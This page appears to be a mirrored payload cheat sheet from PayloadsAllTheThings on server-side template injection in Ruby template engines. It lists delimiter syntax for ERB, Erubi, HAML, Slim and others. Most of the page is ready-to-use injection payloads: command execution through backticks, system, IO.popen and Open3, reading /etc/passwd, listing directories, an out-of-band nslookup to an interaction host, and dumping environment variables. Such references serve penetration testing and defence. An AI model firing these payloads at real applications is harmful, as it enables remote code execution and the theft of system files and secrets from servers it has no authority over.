ruby.md (3050B)
1 --- 2 title: "Server Side Template Injection - Ruby" 3 topic: "Server Side Template Injection" 4 topicSlug: "server-side-template-injection" 5 sourcePath: "Server Side Template Injection/Ruby.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Server%20Side%20Template%20Injection/Ruby.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # Server Side Template Injection - Ruby 12 13 > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Ruby, SSTI can occur when using templating engines like ERB (Embedded Ruby), Haml, liquid, or Slim, especially when user input is incorporated into templates without proper sanitization or validation. 14 15 ## Summary 16 17 - [Templating Libraries](#templating-libraries) 18 - [Universal Payloads](#universal-payloads) 19 - [Ruby](#ruby) 20 - [Ruby - Basic injections](#ruby---basic-injections) 21 - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) 22 - [Ruby - List files and directories](#ruby---list-files-and-directories) 23 - [Ruby - Remote Command execution](#ruby---remote-command-execution) 24 - [References](#references) 25 26 ## Templating Libraries 27 28 | Template Name | Payload Format | 29 |---------------|----------------| 30 | Erb | `<%= %>` | 31 | Erubi | `<%= %>` | 32 | Erubis | `<%= %>` | 33 | HAML | `#{ }` | 34 | Liquid | `{{ }}` | 35 | Mustache | `{{ }}` | 36 | Slim | `#{ }` | 37 38 ## Universal Payloads 39 40 Generic code injection payloads work for many Ruby-based template engines, such as Erb, Erubi, Erubis, HAML and Slim. 41 42 To use these payloads, wrap them in the appropriate tag. 43 44 ```ruby 45 %x('id') # Rendered RCE 46 File.read("Y:/A:/"+%x('id')) # Error-Based RCE 47 1/(system("id")&&1||0) # Boolean-Based RCE 48 system("id && sleep 5") # Time-Based RCE 49 ``` 50 51 ## Ruby 52 53 ### Ruby - Basic injections 54 55 **ERB**: 56 57 ```ruby 58 <%= 7 * 7 %> 59 ``` 60 61 **Slim**: 62 63 ```ruby 64 #{ 7 * 7 } 65 ``` 66 67 ### Ruby - Retrieve /etc/passwd 68 69 ```ruby 70 <%= File.open('/etc/passwd').read %> 71 ``` 72 73 ### Ruby - List files and directories 74 75 ```ruby 76 <%= Dir.entries('/') %> 77 ``` 78 79 ### Ruby - Remote Command execution 80 81 Execute code using SSTI for **Erb**,**Erubi**,**Erubis** engine. 82 83 ```ruby 84 <%=(`nslookup oastify.com`)%> 85 <%= system('cat /etc/passwd') %> 86 <%= `ls /` %> 87 <%= IO.popen('ls /').readlines() %> 88 <% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> 89 <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> 90 ``` 91 92 Execute code using SSTI for **Slim** engine. 93 94 ```powershell 95 #{ %x|env| } 96 ``` 97 98 ## References 99 100 - [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/) 101 - [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)